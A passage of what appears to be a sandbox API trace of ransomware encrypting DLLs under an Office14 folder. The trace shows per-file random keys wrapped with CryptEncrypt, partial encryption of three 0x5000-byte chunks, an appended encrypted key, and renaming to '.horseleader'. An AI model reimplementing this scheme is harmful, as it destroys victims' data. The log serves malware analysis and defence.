shared\\office14\\acetxt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0243.862] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 70 [0243.862] StrStrW (lpFirst="ACETXT.DLL", lpSrch=".txt") returned 0x0 [0243.862] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=297360) returned 1 [0243.862] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.862] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.865] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0243.865] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.865] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x21cc8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.865] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.867] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0243.867] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.868] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x43990, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.868] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.870] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0243.870] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.871] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.871] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0243.871] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0243.871] CloseHandle (hObject=0x158) returned 1 [0243.871] GetProcessHeap () returned 0x780000 [0243.871] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0243.872] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL.horseleader") returned 82 [0243.872] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acetxt.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acetxt.dll.horseleader")) returned 1 [0243.873] GetProcessHeap () returned 0x780000 [0243.873] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0243.873] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1092c00, ftCreationTime.dwHighDateTime=0x1cb71c7, ftLastAccessTime.dwLowDateTime=0xd82ba220, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x1092c00, ftLastWriteTime.dwHighDateTime=0x1cb71c7, nFileSizeHigh=0x0, nFileSizeLow=0x2e8da0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ACEWDAT.DLL", cAlternateFileName="")) returned 1 [0243.873] lstrcmpiW (lpString1="ACEWDAT.DLL", lpString2="Windows") returned -1 [0243.873] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL") returned 71 [0243.873] StrStrIW (lpFirst="ACEWDAT.DLL", lpSrch=".horseleader") returned 0x0 [0243.873] lstrcmpW (lpString1="ACEWDAT.DLL", lpString2="#Decrypt#.txt") returned 1 [0243.873] lstrcmpW (lpString1="ACEWDAT.DLL", lpString2="_uninstalling_.png") returned 1 [0243.873] lstrlenW (lpString=".testttjffg") returned 11 [0243.873] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL", lpSrch=".testttjffg") returned 0x0 [0243.873] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0243.873] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0243.873] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewdat.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0243.874] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL") returned 71 [0243.874] StrStrW (lpFirst="ACEWDAT.DLL", lpSrch=".txt") returned 0x0 [0243.874] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3050912) returned 1 [0243.874] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.874] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.877] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0243.877] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.877] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x171ed0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.877] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.883] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0243.883] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.883] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x2e3da0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.883] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.888] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0243.888] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.889] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.889] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0243.889] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0243.889] CloseHandle (hObject=0x158) returned 1 [0243.893] GetProcessHeap () returned 0x780000 [0243.893] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0243.893] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL.horseleader") returned 83 [0243.893] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewdat.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewdat.dll.horseleader")) returned 1 [0243.894] GetProcessHeap () returned 0x780000 [0243.894] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0243.894] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e0c9f00, ftCreationTime.dwHighDateTime=0x1cba5d5, ftLastAccessTime.dwLowDateTime=0xcf0c7d40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x8e0c9f00, ftLastWriteTime.dwHighDateTime=0x1cba5d5, nFileSizeHigh=0x0, nFileSizeLow=0x4dba0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ACEWSS.DLL", cAlternateFileName="")) returned 1 [0243.895] lstrcmpiW (lpString1="ACEWSS.DLL", lpString2="Windows") returned -1 [0243.895] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL") returned 70 [0243.895] StrStrIW (lpFirst="ACEWSS.DLL", lpSrch=".horseleader") returned 0x0 [0243.895] lstrcmpW (lpString1="ACEWSS.DLL", lpString2="#Decrypt#.txt") returned 1 [0243.895] lstrcmpW (lpString1="ACEWSS.DLL", lpString2="_uninstalling_.png") returned 1 [0243.895] lstrlenW (lpString=".testttjffg") returned 11 [0243.895] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL", lpSrch=".testttjffg") returned 0x0 [0243.895] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0243.895] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0243.895] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewss.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0243.897] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL") returned 70 [0243.897] StrStrW (lpFirst="ACEWSS.DLL", lpSrch=".txt") returned 0x0 [0243.897] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=318368) returned 1 [0243.897] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.897] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.916] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0243.916] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.917] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x245d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.917] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.919] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0243.919] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.919] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x48ba0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.919] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.922] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0243.922] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.922] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.922] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0243.922] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0243.922] CloseHandle (hObject=0x158) returned 1 [0243.923] GetProcessHeap () returned 0x780000 [0243.923] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0243.923] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL.horseleader") returned 82 [0243.923] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewss.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewss.dll.horseleader")) returned 1 [0243.925] GetProcessHeap () returned 0x780000 [0243.925] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0243.925] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35d59d00, ftCreationTime.dwHighDateTime=0x1cba5d5, ftLastAccessTime.dwLowDateTime=0xd82e0380, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x35d59d00, ftLastWriteTime.dwHighDateTime=0x1cba5d5, nFileSizeHigh=0x0, nFileSizeLow=0x7a998, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ACEXBE.DLL", cAlternateFileName="")) returned 1 [0243.925] lstrcmpiW (lpString1="ACEXBE.DLL", lpString2="Windows") returned -1 [0243.925] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL") returned 70 [0243.925] StrStrIW (lpFirst="ACEXBE.DLL", lpSrch=".horseleader") returned 0x0 [0243.925] lstrcmpW (lpString1="ACEXBE.DLL", lpString2="#Decrypt#.txt") returned 1 [0243.925] lstrcmpW (lpString1="ACEXBE.DLL", lpString2="_uninstalling_.png") returned 1 [0243.925] lstrlenW (lpString=".testttjffg") returned 11 [0243.925] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL", lpSrch=".testttjffg") returned 0x0 [0243.925] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0243.925] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0243.926] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acexbe.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0243.927] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL") returned 70 [0243.927] StrStrW (lpFirst="ACEXBE.DLL", lpSrch=".txt") returned 0x0 [0243.927] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=502168) returned 1 [0243.927] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.927] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.930] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0243.930] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.930] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x3accc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.931] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.933] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0243.933] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.933] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x75998, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.933] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.935] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0243.935] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.936] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.936] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0243.936] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0243.936] CloseHandle (hObject=0x158) returned 1 [0243.936] GetProcessHeap () returned 0x780000 [0243.936] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0243.937] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL.horseleader") returned 82 [0243.937] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acexbe.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acexbe.dll.horseleader")) returned 1 [0243.938] GetProcessHeap () returned 0x780000 [0243.938] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0243.938] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67c38700, ftCreationTime.dwHighDateTime=0x1cbc9fc, ftLastAccessTime.dwLowDateTime=0xe5d21520, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x67c38700, ftLastWriteTime.dwHighDateTime=0x1cbc9fc, nFileSizeHigh=0x0, nFileSizeLow=0x5e158, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ATLCONV.DLL", cAlternateFileName="")) returned 1 [0243.938] lstrcmpiW (lpString1="ATLCONV.DLL", lpString2="Windows") returned -1 [0243.938] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL") returned 71 [0243.938] StrStrIW (lpFirst="ATLCONV.DLL", lpSrch=".horseleader") returned 0x0 [0243.938] lstrcmpW (lpString1="ATLCONV.DLL", lpString2="#Decrypt#.txt") returned 1 [0243.938] lstrcmpW (lpString1="ATLCONV.DLL", lpString2="_uninstalling_.png") returned 1 [0243.938] lstrlenW (lpString=".testttjffg") returned 11 [0243.938] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL", lpSrch=".testttjffg") returned 0x0 [0243.938] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0243.938] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0243.938] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common 